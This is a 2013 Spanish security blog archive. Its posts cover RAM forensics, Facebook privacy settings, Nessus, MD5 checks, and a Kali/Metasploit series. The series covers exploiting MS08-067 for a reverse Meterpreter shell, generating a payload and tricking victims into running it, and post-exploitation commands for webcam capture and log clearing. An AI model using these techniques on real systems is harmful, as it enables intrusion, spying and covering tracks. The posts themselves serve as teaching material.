sábado, 30 de noviembre de 2013

Como hacer un volcado de la RAM

Aprovechando la fria tarde de Sábado, me pongo a probar técnicas de Análisis Forense que solo había visto teóricamente y me empieza a picar la curiosidad porque es tan importante no apagar el ordenador, un caso extremo se produce cuando la policía asalta la casa de un ciberdelincuente para arrestarle y ponerlo a manos de la justicia, el ordenador es una de las principales pruebas que se usaran contra el acusado y para ello se realiza cuando llegan los forenses informáticos un volcado de la RAM que puede contener pruebas solidas para usar en un juicio.

Así que vamos con el laboratorio:

La memoria RAM es una unidad de almacenamiento volátil (pierde los datos cuando se interrumpe el flujo eléctrico.), con lo que un apagado o reinicio podría anular esta evidencia.

El funcionamiento del volcado de RAM es fácil, pero lo difícil hacerlo bien, se usan programas de volcado de RAM  pero al instalarlos estos ya pasarían a sobrescribir bits en la RAM, lo mas usado son herramientas ajenas al equipo y suelen ser el linea de comandos y aprobado por el sistema judicial como que mantiene la integridad de los datos,es decir, los datos no han podido ser manipulados.

Nosotros, como iniciación al análisis forense vamos a usar un programa para este proceso llamado FTK Imager, que nos proporciona una interfaz gráfica sencilla pero util.

Una vez instalada, nos dirigimos al icono que hay una ram pintada y clickamos y decimos donde queremos que se guarde toda la información del volcado de la RAM.


Una vez terminado damos a "close" y nos dirigimos a "Add evidence Item" y seleccionamos que sea sobre un archivo imagen.


Y seleccionamos donde hemos guardado antes el volcado, hay que buscar el archivo .mem


Y nos cargara el archivo, en el veremos 3 columnas destacadas. La primera es la posición de memoria, la segunda los valores hexadecimales en esa posición y la tercera codificación ANSI.

En esta imagen se puede ver una localización sobre datos personales, que use para un formulario en una pagina de Internet.

Como el archivo suele ser muy grande que haríamos sin un buscador, para acceder a el Control+F y realizar nuestras búsquedas personalizadas de palabras clave.

También otra de las utilidades es extraer la SAM y el System, que es donde se guardan los usuarios del sistema y luego podríamos usar ophcrack para conseguir descifrar las contraseñas.


Un placer haber podido sacar un tiempo valioso en semana de exámenes para compartir conocimiento, espero que vuestra curiosidad no se quede en estas lineas y sigáis jugando con la herramienta.

Saludos guerreros!!

miércoles, 27 de noviembre de 2013

Periodo corto inactividad

Debido a una oleada de examenes, siento tener que comunicar que el blog estará inactivo hasta el 15 de Diciembre.

Alomejor se sube alguna noticia espontanea pero no esta nada planeado.

Pero volvere cargado de ideas y proyectos novedosos. 

Saludos guerreros!!


lunes, 25 de noviembre de 2013

Configuraciones basicas en perfiles de facebook

Las redes sociales son cada vez mas usadas por la mayoría de personas de todos los lugares del mundo, pero hay que saber darles un buen uso, yo me voy a centrar en Facebook y vamos a aplicar unas medidas de seguridad que nos ayuden a aumentar nuestra privacidad.


Tal como estuvimos comentando en: Sin privacidad, donde se comentaron temas personales sobre casos de experiencias con facebook se puede llegar a ver cantidad de burradas en facebook.

Es importante que solo tengamos visible para nuestros amigos la información que compartimos, comentamos, gustos y grupos.

Lo primero que veremos es acceder a lo que ven el resto de usuarios cuando entran a mi biografia, esto nos dara una idea en que estamos desprotegidos o que informacion no queremos que sea mostrada. 

**La cuenta que sale en este post, fue creada unica y exclusivamente para configurar opciones y parametros con un nombre al azar.


A nivel de publico:
Para acceder a lo que el resto ve en nuestra biografia clickamos en ver como.. 

Como norma básica configuraremos que solo puedan ver mis cosas mis amigos:

Las relaciones suelen decir mucho de la persona, podemos ver con quien esta cada uno. La verdad yo no pondría ninguna relación temporal, y sea lo que sea  solo para "amigos"

Las publicaciones es un tema importante de proteger, por ello tenemos que ponerlas todas solo para amigos.
Algo interesante son entradas señaladas como publicas, eso significa que la persona o pagina sobre la que comentaste, compartiste o me gusta, tiene el perfil publico y cualquiera puede ver que tu hiciste la acción.

Una opción que por defecto viene desactivada, es evitar que se publiquen las fotos en las que sales, si activamos esta opción cuando seamos etiquetados tendremos la opción de aceptar para que sea agregada a nuestra biografía o denegar.


Las secciones suelen estar abiertas por defecto como Libros, Musica, Grupos y dicen mucho de la persona, para administrarlas vamos a una de estas secciones click en el lapiz > Administrar seccion, y aquí seleccionamos las que no queremos que se vean. 



A nivel interno:
Facebook ofrece un historial de accesos,En seguridad vemos en la parte inferior un historial donde te da aproximadamente la localidad  usando geolocalización, el sistema operativo y el navegador usado. Con finalizar actividad nos permite borrar la entrada.


Una practica fundamental es eliminar mensajes que puedan causarte problemas a ti o a la otra parte, es algo que nadie hace pero si tu te dejas un día la cuenta abierta y alguien accede puede ver Todo lo que has escrito desde que creaste facebook.



La guardia civil publico un pdf con consejos para ser un usuario de Facebook seguro, el mejor consejo es: "Usa tu sentido comun y no hagas nada de lo que puedas arrepentirte el dia de mañana". Y antes de publicar cualquier cosa piensa sus consecuencias en el peor de los casos.




Tocando estos simples parametros y retocando algun que puedan haber quedado expuestas tenemos un per

** Por que mas cosas publiques no vas a ser mas popular, por publicar menos puedes conseguir ser mas 








domingo, 24 de noviembre de 2013

Kali Linux: de 0 a metasploit 4, Comandos basicos meterpreter


Visto que hemos hablado en la serie 2 y 3 con final en un meterpreter, hoy vamos a ir exponiendo cada comando y su funcion.

Si quieres verlo en ingles, en la pagina de ofenssive security.

Control +C : Corta el proceso que se esta ejecutando

NAVEGACIÓN DIRECTORIOS /CARPETAS
pwd -- Muestra la ruta en la que estamos posicionados
Ejemplo: C:\Users\Victima\Desktop

ls -- Lista los directorios y archivos de ese directorio detallado.

mkdir <nombre> -- Crea una carpeta con ese nombre
rmdir <nombre> -- Borra la carpeta

cd <ruta> -- Nos permite movernos por los directorios

lpwd y lcd -- Nos permite movernos por nuestro Kali. (Local)


INFORMACIÓN
ipconfig -- Muestra las conexiones de red del sistema.

route -- Muestra las tablas de enrutamiento IPv4 y IPv6

sysinfo -- muestra el nombre del usuario, S.O. arquitectura, lenguaje y meterpreter.


RED
download <ruta> -- Descarga el archivo

update <ruta archivo kali>

ARCHIVOS

execute -f <archivo> -- Ejecuta el archivo.

search -f *.ext -- Busca un archivo o archivos por el sistema.

screenshot -- Realiza una instantanea sobre el pc victima.


cat <archivo>-- Muestra el contenido de un archivo

edit <archivo> -- Permite modificar un fichero con VIM.
Escribir i
Guardar y salir Esc y :x
Salir sin guardar Esc y :q
Forzar cierre Esc y :q!


WEBCAM
webcam_list -- Muestra las webcams disponibles

webcam_snap -- Toma una instantanea, con -h accedemos a la ayuda


SISTEMA

idletime -- Muestra el tiempo que el sistema lleva sin interacciones.

ps -- Muestra los procesos del  sistema y del usuario

migrate <pid> -- Migra del proceso svchost.exe al numero que asignemos, suele usarse el de explorer.exe, que es el casi nunca se cierra hasta que el sistema se apaga.

Background --  Pone la sesion en segundo plano, para volver sessions -i 1

enumdesktops -- Enumera todos los escritorios disponibles

clearev -- Borrará la aplicación, el sistema y los registros de seguridad en un sistema de ventanas (Se necesitan permisos de System)


shell -- Abre una conexion con el cmd de Windows y trabajar con comandos de este. exit para volver a meterpreter

Espero que les guste y sea de utilidad.
Saludos guerreros!!

sábado, 23 de noviembre de 2013

Kali Linux: de 0 a metasploit 3, Crear un payload

Serie: De 0 a Metasploit
Conseguir una sesion de meterpreter
Crear un payload
Comandos basicos meterpreter


El ataque de hoy esta orientado a crear un payload que después podemos meter en un fichero y enviarlo a nuestra victima, de esta forma evitaremos muchos pasos y simplemente con un poco de ingenieria social se llevaria satisfactoriamente el ataque.

Vamos a la consola de metasploit. msfconsole y creamos nuestro payload manualmente:

#payload <payload> LHOST=<nuestraip> LPORT=4444 x >/<ruta donde queramos guardar el archivo>

x: Obtiene una shellcode en .exe, esta x podria sustituirse por C(C), R(Ruby),J(Javascript),P(Perl),R(lenguaje maquina).


para ver la lista de payloads disponibles escribir: >payload -l  

Yo usare el mismo payload que habiamos usado en el capitulo 2.


Y lo buscaremos en la carpeta donde le digimos.

Ahora tenemos que tirar de ingenieria social (Es la habilidad con la que podemos enagañar a un usuario para transformarla en victima), en nuestro caso tendra que hacker un doble click para abrir el archivo.

1º Una podria ser diciendo que es un crack para un juego
2º Bindearlo(Adjuntarlo) en un pdf, word, fotografia
3º Poniendolo en un winrar y crear un autoejecutable.
4º Poniendo un nombre que lo haga delicioso.
...


Ahora el cliente ya lo ha ejecutado. Pero
Tendremos que tener cuidado con los antivirus porque estos detectan esa actitud. Asi que desactivaremos el antivirus para esta practica.

Si no tenemos un listener, lo creamos:

Y cuando el cliente intente abrir el archivo nos lanzara un shell de meterpreter. Y ya tenemos el control de la maquina.


Saludos guerreros!!

Kali Linux: Instalacion nessus y scan

Nessus es un potente analizador de vulnerabilidades muy usado en el mundo pentester, permite automatizar el proceso del escaneo y busqueda de vulnerabilidades, como vimos con openvas.

Funciones de comparaciones de Nessus en versión evaluación y oficial.


Vamos a su pagina oficial y descargar Nessus, para Kali usaremos Nessus-5.2.4-ubuntu1110_i386.deb y necesitareis ir a mirar el correo en el que llegara un código de activación.

Vamos a la carpeta donde este el fichero descargado y:

dpkg -i Nessus-5.2.4-ubuntu1110_i386.deb

Cuando lo tengamos iniciamos el servicio:
 /etc/init.d/nessusd start


Y vamos al navegador con el que interactuaremos con nessus:
https://kali:8834/  ,nos saldra un problema del certificador por el https pero presionamos "understand the risk" y lo añadimos como excepcion.

Y llegamos al panel de Nessus:


En la ventana de login, es donde crearemos nuestra cuenta y despues introducimos el codigo de activacion que nos llego al correo.

Ahora esperaremos a que se actualice... y luego se iniciara. De normal suele alargarse mucho asi que con tranquilidad.

Después de la espera, llegaremos al login donde introduciremos nuestro login y password que pusimos una vez que iniciamos.



Como vemos tiene una interfaz bastante amigable con la que interactuaremos:
Vamos a explicar un poco los menus y haremos un scaneo.
Scan: Sirve par realizar un escaneo apoyando se en una politica:
Schedules (Horarios) o frecuencia en que queremos realizar los escaneos.
Policies (Politicas) que aplicaremos como metodo a seguir.
Users: Panel en el que crear y administrar los usuarios, disitingueremos entre admins y standar.


Empezamos con un analisis sobre un host, yo he elegido una pagina web que tengo juegos en HTML5 y comprobare la seguridad de que tiene esta.

Vamos a la pestaña "Policies" y clickamos en "New policy", los parametros que yo he introducido son un estilo a esto. 
Opcion: Basic Network Scan.
**Las credenciales las he puesto al azar simplemente porque si no no puedes continuar

Una vez creada la política, vamos a scan y presionamos en "New scan" y configuramos como necesitemos:
Name: Simplemente con que nombre queremos que se guarde en nessus.
Policy: La politica que queramos aplicar
Folder: Es la carpeta en la que se archivara
Target: Ip victiama o tambien podemos subir un fichero de texto plano con las ips con las ips que queremos analizar.

Una vez haya terminado el análisis /escaneo, nos dara un resumen y un gráfico de las fallas de seguridad que ha encontrado o simplemente información relevante.


Si damos a cualquiera de ellas nos ofrece una pequeña información de porque ha arrojado esa advertencia, lo que puede dar mucha solidez para un informe de una auditoria de seguridad o para un administrador que quiera ver las debilidades del sistema que administra.

El resto es ir probando y jugando con las opciones, Nessus permite navegar y probar facilmente por sus  opciones y no te resultara dificil coger habilidad con la herramienta, el problema principal que la versión de evaluacion son 7 dias con lo que tendras que realizar lo que necesites en ese periodo.

Espero que les haya servido de utilidad y Saludos guerreros!!

miércoles, 20 de noviembre de 2013

Kali Linux: De 0 a Metasploit 2, Conseguir una sesion de meterpreter


Primero he tenido que realizar unos cambios en mi red para que esta este en la misma red local y tener conexion directa con estas.

Reiniciamos las interfaces con /etc/init.d/networking restart


Planteamiento del proceso: Queremos acceder a un ordenador X que hay en la red local por el motivo que sea, en mi caso sera un ordenador físico y conseguir una sesión de meterpreter.

Empezamos!!
Vamos a lanzar Zenmap (Nmap en version grafica) para obtener que equipos y puertos estan en la red.
Y ya vemos los equipos que hay en la red, ahora hemos elegido que vamos a atacar al 37.


Escaneo al objetivo, aquí se exponen dos de las posibles soluciones la primera es realizarlo con zenmap y la segunda ya es usando el metasploit, aquí a gusto de cada uno.


Ahora vamos a encender el metasploit si no lo tenias abierto acuérdate de abrir una terminal, como explicamos en la parte 1 y teclear msfconsole.

¿Como vamos a entrar? Viendo que nuestro equipo usa Windows XP y con el puerto 445 abierto explotaremos justo alli la vulnerabilidad que nos de acceso.

¿Para que se usa el puerto 445? Las aplicaciones en Windows XP utilizan el puerto 445 para usar el servicio SMB (Service Message Block) que permite compartir archivos e impresoras (entre otras cosas) entre nodos de una red.

Comprobaremos la version de SMB con un auxiliar de metasploit.

Ahora vamos a explotar la vulnerabilidad y conseguir un meterpreter para podernos mover.

Exploit: Utilizaremos la vulnerabilidad MS08_067_netapi
PAYLOAD: Una reverse_rcp, lo que creara una conexión de dentro a fuera con lo que reducirá la posibilidad de que un antivirus o firewall corte el proceso.
RHOST: IP victima
LHOST: IP atacante

Apunte: Si vamos a nuestra victima y ponemos en el xp el comando:netstat -an | more  Veremos que hay una conexion viva al atacante.192.168.1.37:1445   192.168.1.67:4444  ESTABILISHED

¿Que podemos hacer en fase post-explotacion?
Ahora podemos navegar como si estuviéramos en la maquina de la victima pero usando comandos de linux.  

Algunos ejemplos utiles.
mkdir c://mznlabsec   (Nos crea una carpeta en C://)
ps (Veremos los procesos)
migrate <PID> -Migrar el proceso para no perder la sesion en caso de que apaque la maquina. Por defecto estamos en svchost.exe, se suele usar el explorer.exe como destino de la migración.

Ahora subiremos un archivo de texto plano que hemos creado en kali al windows y listamos el contenido de la carpeta para comprobar que esta.

Para no alargar mas el tutorial, si alguno esta un poco perdido en este paso: Podéis consultar el video tutorial de backtrackacademy sobre meterpreter


Saludos guerreros!!


**Esta práctica no tiene intenciones maliciosas, es un entorno de laboratorio controlado por el administrador, el cual es usado para aprender sobre las tecnologías, concienciar de los peligros de sus usos y evitar ser victima de un ataque.

martes, 19 de noviembre de 2013

Verifica la integridad de tus descargas

Cada vez mas vemos como las paginas que ofrecen descargar algún archivo ligero nos ofrecen tres opciones con números muy largos, los que ya sepáis estamos hablando de algoritmos como MD5 y SHA1 son los mas populares en este proceso.

Este conjunto de caracteres es llamado Hash, y es creado a base de una función hash.

Aquí un ejemplo de pagina web donde nos ofrecen el hash md5 para comprobarlo si coincide con el del archivo descargado.


Se usa para evitar que un documento que halla sido manipulado en la descarga o que alguien lo haya sustituido por el suyo en el servidor, con lo que ese hash saldrá distinto.

Vamos a comprobar el hash MD5 del archivo descargado en la foto anterior: Pero primero necesitamos descargar el comprobador de md5 que usaremos en nuestro Windows, yo he usado md5sum.exe pero podriais usar cualquier otro.

En el caso de usar md5sum deberéis moverlo a c:/Windows/System32 y así ya lo podréis llamar por consola.

La sintaxis es facil una vez posicionado en la ruta o escribiendola a la hora de poner el archivo, es:  md5sum [archivo]



¡¡Coinciden!!
También podemos comprobar el md5 antes de subir un archivo y publicar el md5 que tiene así daremos una capa de integridad para el que lo desee.


¿Todos los sitios nos ofrecen estos hashes?
No es una cosa obligatoria así que es implementada por quien lo ve una buena opción como hemos visto no cuesta nada si eres un servidor de archivos.

Pero menos mal no todos obligan a tener un plugin de Java para comprobar su integridad. En este documento  de la agencia tributaria al programa de ayudas a quienes quieren verificarlo no les queda otra, un vil puñetazo a la libre descarga de software de terceros. 

¿Y como compruebo si tengo algun problema de integridad?
Un comando que comprueba la integridad de archivos es sfc /scannow , que permite examinar, proteger y restaurar archivos del sistema que pudieran haber sido alterado por malware.

Aunque no hay que poner fe ciega en  MD5 porque como ya nombramos el algoritmo fue roto en 2004 y alguien con conocimientos de criptografia podria generar md5 identicos con ficheros modificados.


Saludos guerreros!!